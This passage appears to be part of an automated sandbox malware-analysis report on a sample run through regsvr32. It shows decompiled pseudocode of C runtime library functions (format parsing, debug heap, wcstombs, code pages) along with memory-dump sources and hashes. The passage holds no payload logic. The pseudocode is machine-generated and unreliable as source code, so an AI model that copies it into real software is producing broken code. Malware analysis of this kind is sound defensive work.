				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}





                                                      0x7fef9d3bdf2
                                                      0x7fef9d3bdf4
                                                      0x7fef9d3be01
                                                      0x7fef9d3be0a
                                                      0x7fef9d3be0c
                                                      0x7fef9d3be14
                                                      0x7fef9d3be29
                                                      0x7fef9d3be3a
                                                      0x7fef9d3be49
                                                      0x7fef9d3be53
                                                      0x7fef9d3be61
                                                      0x7fef9d3be6b
                                                      0x7fef9d3be71
                                                      0x7fef9d3be84
                                                      0x7fef9d3be91
                                                      0x7fef9d3be9d
                                                      0x7fef9d3bea5
                                                      0x7fef9d3beae
                                                      0x7fef9d3beb2
                                                      0x7fef9d3bebb
                                                      0x7fef9d3bed1
                                                      0x7fef9d3bee2
                                                      0x7fef9d3bef0
                                                      0x7fef9d3befc
                                                      0x7fef9d3bf04
                                                      0x7fef9d3bf17
                                                      0x7fef9d3bf28
                                                      0x7fef9d3bf36
                                                      0x7fef9d3bf42
                                                      0x7fef9d3bf4a
                                                      0x7fef9d3bf5a
                                                      0x7fef9d3bf6a
                                                      0x7fef9d3bf7a
                                                      0x7fef9d3bf8a
                                                      0x7fef9d3bf9a
                                                      0x7fef9d3bfaa
                                                      0x7fef9d3bfac
                                                      0x7fef9d3bfae
                                                      0x7fef9d3bfb9
                                                      0x7fef9d3bfbe
                                                      0x7fef9d3bfc7
                                                      0x7fef9d3bfcb
                                                      0x7fef9d3bfd1
                                                      0x7fef9d3bfe6
                                                      0x7fef9d3bff7
                                                      0x7fef9d3c006
                                                      0x7fef9d3c02d

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2576288505-192189897
                                                      • Opcode ID: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                      • Instruction ID: 7a8513096c3cb2bd444751f94b1f2e61cedcdb1a9580f93edff9428065c01d53
                                                      • Opcode Fuzzy Hash: 4684e22f791ce69839f562b923e995fff9986fe21dc9389a852d4c7307e36990
                                                      • Instruction Fuzzy Hash: 0C415B72A0DAC28AE7F0DB24E8947BEB7E4E384745F600126D6DD869A9DB3DD541CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3DD95 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 24%
                                                      			E000007FE7FEF9D3DD95(signed int _a80, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
				void* _t113;
				char* _t133;

				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
				_t133 =  &_a1560;
				_a116 = E000007FE7FEF9D31E40(_t133);
				if (_a116 >= 0) goto 0xf9d3ddc2;
				_a116 = 0xffffffff;
				goto 0xf9d3dddb;
				_a116 = _t113 + _t133 - 0x30;
				_a1408 = _a1208 & 0x0000ffff;
				if (_a1408 == 0x49) goto 0xf9d3de66;
				if (_a1408 == 0x68) goto 0xf9d3df6f;
				if (_a1408 == 0x6c) goto 0xf9d3de24;
				if (_a1408 == 0x77) goto 0xf9d3df7c;
				goto 0xf9d3df88;
				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
				_a1544 =  &(_a1544[1]);
				asm("bts eax, 0xc");
				goto 0xf9d3de61;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3df88;
				asm("bts eax, 0xf");
				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
				_a1544 =  &(_a1544[2]);
				asm("bts eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
				_a1544 =  &(_a1544[2]);
				asm("btr eax, 0xf");
				goto 0xf9d3df6d;
				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
				goto 0xf9d3df6d;
				_a1216 = 0;
				goto E000007FE7FEF9D3DC41;
				goto 0xf9d3df88;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3df88;
				asm("bts eax, 0xb");
				_a1412 = _a1208 & 0x0000ffff;
				_a1412 = _a1412 - 0x41;
				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
				goto __rax;
			}





                                                      0x7fef9d3dda0
                                                      0x7fef9d3dda2
                                                      0x7fef9d3ddaf
                                                      0x7fef9d3ddb8
                                                      0x7fef9d3ddba
                                                      0x7fef9d3ddc2
                                                      0x7fef9d3ddd7
                                                      0x7fef9d3dde8
                                                      0x7fef9d3ddf7
                                                      0x7fef9d3de01
                                                      0x7fef9d3de0f
                                                      0x7fef9d3de19
                                                      0x7fef9d3de1f
                                                      0x7fef9d3de32
                                                      0x7fef9d3de40
                                                      0x7fef9d3de4c
                                                      0x7fef9d3de54
                                                      0x7fef9d3de5d
                                                      0x7fef9d3de61
                                                      0x7fef9d3de6a
                                                      0x7fef9d3de80
                                                      0x7fef9d3de91
                                                      0x7fef9d3de9f
                                                      0x7fef9d3deab
                                                      0x7fef9d3deb3
                                                      0x7fef9d3dec6
                                                      0x7fef9d3ded7
                                                      0x7fef9d3dee5
                                                      0x7fef9d3def1
                                                      0x7fef9d3def9
                                                      0x7fef9d3df09
                                                      0x7fef9d3df19
                                                      0x7fef9d3df29
                                                      0x7fef9d3df39
                                                      0x7fef9d3df49
                                                      0x7fef9d3df59
                                                      0x7fef9d3df5b
                                                      0x7fef9d3df5d
                                                      0x7fef9d3df68
                                                      0x7fef9d3df6d
                                                      0x7fef9d3df76
                                                      0x7fef9d3df7a
                                                      0x7fef9d3df80
                                                      0x7fef9d3df95
                                                      0x7fef9d3dfa6
                                                      0x7fef9d3dfb5
                                                      0x7fef9d3dfdc

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                      • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2576288505-734865713
                                                      • Opcode ID: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                      • Instruction ID: 14f8518244b6aa56c92c2133ed4feb23c5223715f37474fc6187c6031a63ef29
                                                      • Opcode Fuzzy Hash: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                      • Instruction Fuzzy Hash: 94414DB2A0C6C28AE7F09B64E8407BEB2E4F384746F600125D6C9875E8DB3DD444CF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D26C32 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_oneof_swprintf_p
                                                      • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                      • API String ID: 2731067127-3604075083
                                                      • Opcode ID: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                      • Instruction ID: d4871e39cfd66166000c08c845a9e51e3e7b3f71581565f00727d2aef18c331a
                                                      • Opcode Fuzzy Hash: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                      • Instruction Fuzzy Hash: C8415972A0D7C186E7A49B55E8903AEBBA0F784740FA14126E6CD47BA9DB3ED404CF10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D34F20 Relevance: 9.1, APIs: 6, Instructions: 123COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 41%
                                                      			E000007FE7FEF9D34F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
				void* _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				void* _v56;
				signed int _v72;
				long long _v80;
				signed int _v88;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t101;
				long long _t113;
				intOrPtr _t116;
				void* _t117;
				long long _t118;
				long long _t121;
				long long _t122;
				long long _t125;
				void* _t164;

				_t113 = __rax;
				_a32 = r9d;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v88 = E000007FE7FEF9D33B70(_a8, _a16, _a24);
				E000007FE7FEF9D2E680(_t79, _t113);
				_v80 = _t113;
				0xf9d24000();
				_v56 = _t113 + 0x100;
				 *_v56 =  *_v56 + 1;
				if (_v88 == 0xffffffff) goto 0xf9d35103;
				if (_v88 - _a32 <= 0) goto 0xf9d35103;
				if (_v88 - 0xffffffff <= 0) goto 0xf9d34fb9;
				_t116 = _a24;
				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0xf9d34fb9;
				goto 0xf9d34fbe;
				E000007FE7FEF9D2E680(E000007FE7FEF9D2CF80(_t116), _t116);
				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
				_t88 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0xf9d35038;
				_t89 = E000007FE7FEF9D2E680(_t88, _t118);
				_v48 = _t118;
				_t90 = E000007FE7FEF9D2E680(_t89, _t118);
				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
				_v40 = _t121;
				goto 0xf9d35041;
				_v40 = 0;
				if (_v40 == 0) goto 0xf9d350f4;
				r9d = _v72;
				_t92 = E000007FE7FEF9D2E680(E000007FE7FEF9D33BD0(_t90, _a8, _a16, _a24), _t121);
				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0xf9d350c9;
				_t93 = E000007FE7FEF9D2E680(_t92, _t122);
				_v32 = _t122;
				E000007FE7FEF9D2E680(_t93, _t122);
				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
				_v24 = _t125;
				goto 0xf9d350d2;
				_v24 = 0;
				r8d = 0x103;
				E000007FE7FEF9D2E6C0(E000007FE7FEF9D3D7E0(_v24, _a8, _t164), _t125, _v80);
				goto 0xf9d350f6;
				_v88 = _v72;
				goto 0xf9d34f83;
				0xf9d24000();
				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0xf9d35131;
				0xf9d24000();
				_v16 = _t125 + 0x100;
				 *_v16 =  *_v16 - 1;
				if (_v88 == 0xffffffff) goto 0xf9d3514a;
				if (_v88 - _a32 <= 0) goto 0xf9d3514a;
				_t101 = E000007FE7FEF9D2CF80(_v16);
				r9d = _v88;
				return E000007FE7FEF9D33BD0(_t101, _a8, _a16, _a24);
			}


























                                                      0x7fef9d34f20
                                                      0x7fef9d34f20
                                                      0x7fef9d34f25
                                                      0x7fef9d34f2a
                                                      0x7fef9d34f2f
                                                      0x7fef9d34f55
                                                      0x7fef9d34f59
                                                      0x7fef9d34f5e
                                                      0x7fef9d34f63
                                                      0x7fef9d34f6e
                                                      0x7fef9d34f81
                                                      0x7fef9d34f88
                                                      0x7fef9d34f99
                                                      0x7fef9d34fa4
                                                      0x7fef9d34fa6
                                                      0x7fef9d34fb5
                                                      0x7fef9d34fb7
                                                      0x7fef9d34fbe
                                                      0x7fef9d34fcf
                                                      0x7fef9d34fda
                                                      0x7fef9d34fde
                                                      0x7fef9d34fef
                                                      0x7fef9d34ffc
                                                      0x7fef9d34ffe
                                                      0x7fef9d35003
                                                      0x7fef9d35008
                                                      0x7fef9d3502e
                                                      0x7fef9d35031
                                                      0x7fef9d35036
                                                      0x7fef9d35038
                                                      0x7fef9d35047
                                                      0x7fef9d3504d
                                                      0x7fef9d3506f
                                                      0x7fef9d35080
                                                      0x7fef9d3508d
                                                      0x7fef9d3508f
                                                      0x7fef9d35094
                                                      0x7fef9d35099
                                                      0x7fef9d350bf
                                                      0x7fef9d350c2
                                                      0x7fef9d350c7
                                                      0x7fef9d350c9
                                                      0x7fef9d350d2
                                                      0x7fef9d350ef
                                                      0x7fef9d350f4
                                                      0x7fef9d350fa
                                                      0x7fef9d350fe
                                                      0x7fef9d35103
                                                      0x7fef9d3510f
                                                      0x7fef9d35111
                                                      0x7fef9d3511c
                                                      0x7fef9d3512f
                                                      0x7fef9d35136
                                                      0x7fef9d35143
                                                      0x7fef9d35145
                                                      0x7fef9d3514a
                                                      0x7fef9d35170

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                                      • String ID:
                                                      • API String ID: 2452617236-0
                                                      • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                      • Instruction ID: 79c6626e7a9320abdad6ed0e53fbdedc274fcc22452831ee93149e628ab3cd95
                                                      • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                      • Instruction Fuzzy Hash: EC61F132A0DA8586DAB0DB55E45177EB3A0F7C4789F214625E6CD83B6ACB3ED441CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D29F20 Relevance: 9.0, APIs: 6, Instructions: 46COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 27%
                                                      			E000007FE7FEF9D29F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
				long long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				char _v64;
				long long _v72;
				intOrPtr _t29;
				intOrPtr* _t41;

				_t41 = __rax;
				_a8 = __ecx;
				_v16 = 0xfffffffe;
				_v72 = 0;
				0xf9d266b0();
				 *0xf9d4cd68 = 0;
				if (_a8 != 0xfffffffe) goto 0xf9d29f81;
				 *0xf9d4cd68 = 1;
				_v32 = GetOEMCP();
				E000007FE7FEF9D26800( &_v64);
				goto 0xf9d29fe3;
				if (_a8 != 0xfffffffd) goto 0xf9d29fae;
				 *0xf9d4cd68 = 1;
				_v28 = GetACP();
				E000007FE7FEF9D26800( &_v64);
				_t29 = _v28;
				goto 0xf9d29fe3;
				if (_a8 != 0xfffffffc) goto 0xf9d29fe3;
				 *0xf9d4cd68 = 1;
				E000007FE7FEF9D26840(_t29,  &_v64);
				_v24 =  *((intOrPtr*)( *_t41 + 4));
				E000007FE7FEF9D26800( &_v64);
				goto 0xf9d29ff9;
				_v20 = _a8;
				E000007FE7FEF9D26800( &_v64);
				return _v20;
			}












                                                      0x7fef9d29f20
                                                      0x7fef9d29f20
                                                      0x7fef9d29f28
                                                      0x7fef9d29f31
                                                      0x7fef9d29f44
                                                      0x7fef9d29f4a
                                                      0x7fef9d29f59
                                                      0x7fef9d29f5b
                                                      0x7fef9d29f6b
                                                      0x7fef9d29f74
                                                      0x7fef9d29f7f
                                                      0x7fef9d29f86
                                                      0x7fef9d29f88
                                                      0x7fef9d29f98
                                                      0x7fef9d29fa1
                                                      0x7fef9d29fa6
                                                      0x7fef9d29fac
                                                      0x7fef9d29fb3
                                                      0x7fef9d29fb5
                                                      0x7fef9d29fc4
                                                      0x7fef9d29fcf
                                                      0x7fef9d29fd8
                                                      0x7fef9d29fe1
                                                      0x7fef9d29fe7
                                                      0x7fef9d29ff0
                                                      0x7fef9d29ffd

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_
                                                      • String ID:
                                                      • API String ID: 1901436342-0
                                                      • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                      • Instruction ID: 704f50b174c78f8dad9e9ad97ccd9f8c7b4629f2dc49822da5bcfb1c8acb2663
                                                      • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                      • Instruction Fuzzy Hash: 2E21A732D0C64186E7A09B28E84436EBBA0E784768F614226E3DD426F9DB7ED545CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3809F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                                      • API String ID: 2123368286-552404435
                                                      • Opcode ID: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                      • Instruction ID: a80555c9662aee50eaf55af6b2d7c09464ca7ea00ccabcf41043a4b878837ec0
                                                      • Opcode Fuzzy Hash: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                      • Instruction Fuzzy Hash: 4B511726A0DBC586E6B48B19E84476EB3E0F386361F204625D6ED43BE8DF7ED4458B01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3BCBD Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 28%
                                                      			E000007FE7FEF9D3BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
				void* _t184;
				char* _t204;
				char* _t205;

				_a112 = 0;
				_a108 = _a112;
				_a88 = _a108;
				_a92 = _a88;
				_a80 = 0;
				_a116 = 0xffffffff;
				_a76 = 0;
				_a968 = _a696 & 0x000000ff;
				if (_a968 == 0x20) goto 0xf9d3bd57;
				if (_a968 == 0x23) goto 0xf9d3bd64;
				if (_a968 == 0x2b) goto 0xf9d3bd4a;
				if (_a968 == 0x2d) goto 0xf9d3bd3d;
				if (_a968 == 0x30) goto 0xf9d3bd72;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000004;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000001;
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000002;
				goto 0xf9d3bd7d;
				asm("bts eax, 0x7");
				goto 0xf9d3bd7d;
				_a80 = _a80 | 0x00000008;
				if (_a696 != 0x2a) goto 0xf9d3bdbe;
				_t204 =  &_a1112;
				_a88 = E000007FE7FEF9D31E40(_t204);
				if (_a88 >= 0) goto 0xf9d3bdbc;
				_a80 = _a80 | 0x00000004;
				_a88 =  ~_a88;
				goto 0xf9d3bdd5;
				_a88 = _t184 + _t204 - 0x30;
				_a116 = 0;
				if (_a696 != 0x2a) goto 0xf9d3be16;
				_t205 =  &_a1112;
				_a116 = E000007FE7FEF9D31E40(_t205);
				if (_a116 >= 0) goto 0xf9d3be14;
				_a116 = 0xffffffff;
				goto 0xf9d3be2d;
				_a116 = _t184 + _t205 - 0x30;
				_a972 = _a696 & 0x000000ff;
				if (_a972 == 0x49) goto 0xf9d3beb7;
				if (_a972 == 0x68) goto 0xf9d3bfc0;
				if (_a972 == 0x6c) goto 0xf9d3be76;
				if (_a972 == 0x77) goto 0xf9d3bfcd;
				goto 0xf9d3bfd9;
				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
				_a1096 = _a1096 + 1;
				asm("bts eax, 0xc");
				goto 0xf9d3beb2;
				_a80 = _a80 | 0x00000010;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xf");
				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
				_a1096 = _a1096 + 2;
				asm("bts eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
				_a1096 = _a1096 + 2;
				asm("btr eax, 0xf");
				goto 0xf9d3bfbe;
				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
				goto 0xf9d3bfbe;
				_a704 = 0;
				goto E000007FE7FEF9D3BB66;
				goto 0xf9d3bfd9;
				_a80 = _a80 | 0x00000020;
				goto 0xf9d3bfd9;
				asm("bts eax, 0xb");
				_a976 = _a696;
				_a976 = _a976 - 0x41;
				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
				goto __rax;
			}






                                                      0x7fef9d3bcbd
                                                      0x7fef9d3bcc9
                                                      0x7fef9d3bcd1
                                                      0x7fef9d3bcd9
                                                      0x7fef9d3bcdd
                                                      0x7fef9d3bce5
                                                      0x7fef9d3bced
                                                      0x7fef9d3bd02
                                                      0x7fef9d3bd11
                                                      0x7fef9d3bd1b
                                                      0x7fef9d3bd25
                                                      0x7fef9d3bd2f
                                                      0x7fef9d3bd39
                                                      0x7fef9d3bd3b
                                                      0x7fef9d3bd44
                                                      0x7fef9d3bd48
                                                      0x7fef9d3bd51
                                                      0x7fef9d3bd55
                                                      0x7fef9d3bd5e
                                                      0x7fef9d3bd62
                                                      0x7fef9d3bd68
                                                      0x7fef9d3bd70
                                                      0x7fef9d3bd79
                                                      0x7fef9d3bd8d
                                                      0x7fef9d3bd8f
                                                      0x7fef9d3bd9c
                                                      0x7fef9d3bda5
                                                      0x7fef9d3bdae
                                                      0x7fef9d3bdb8
                                                      0x7fef9d3bdbc
                                                      0x7fef9d3bdd1
                                                      0x7fef9d3bdda
                                                      0x7fef9d3bdf2
                                                      0x7fef9d3bdf4
                                                      0x7fef9d3be01
                                                      0x7fef9d3be0a
                                                      0x7fef9d3be0c
                                                      0x7fef9d3be14
                                                      0x7fef9d3be29
                                                      0x7fef9d3be3a
                                                      0x7fef9d3be49
                                                      0x7fef9d3be53
                                                      0x7fef9d3be61
                                                      0x7fef9d3be6b
                                                      0x7fef9d3be71
                                                      0x7fef9d3be84
                                                      0x7fef9d3be91
                                                      0x7fef9d3be9d
                                                      0x7fef9d3bea5
                                                      0x7fef9d3beae
                                                      0x7fef9d3beb2
                                                      0x7fef9d3bebb
                                                      0x7fef9d3bed1
                                                      0x7fef9d3bee2
                                                      0x7fef9d3bef0
                                                      0x7fef9d3befc
                                                      0x7fef9d3bf04
                                                      0x7fef9d3bf17
                                                      0x7fef9d3bf28
                                                      0x7fef9d3bf36
                                                      0x7fef9d3bf42
                                                      0x7fef9d3bf4a
                                                      0x7fef9d3bf5a
                                                      0x7fef9d3bf6a
                                                      0x7fef9d3bf7a
                                                      0x7fef9d3bf8a
                                                      0x7fef9d3bf9a
                                                      0x7fef9d3bfaa
                                                      0x7fef9d3bfac
                                                      0x7fef9d3bfae
                                                      0x7fef9d3bfb9
                                                      0x7fef9d3bfbe
                                                      0x7fef9d3bfc7
                                                      0x7fef9d3bfcb
                                                      0x7fef9d3bfd1
                                                      0x7fef9d3bfe6
                                                      0x7fef9d3bff7
                                                      0x7fef9d3c006
                                                      0x7fef9d3c02d

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
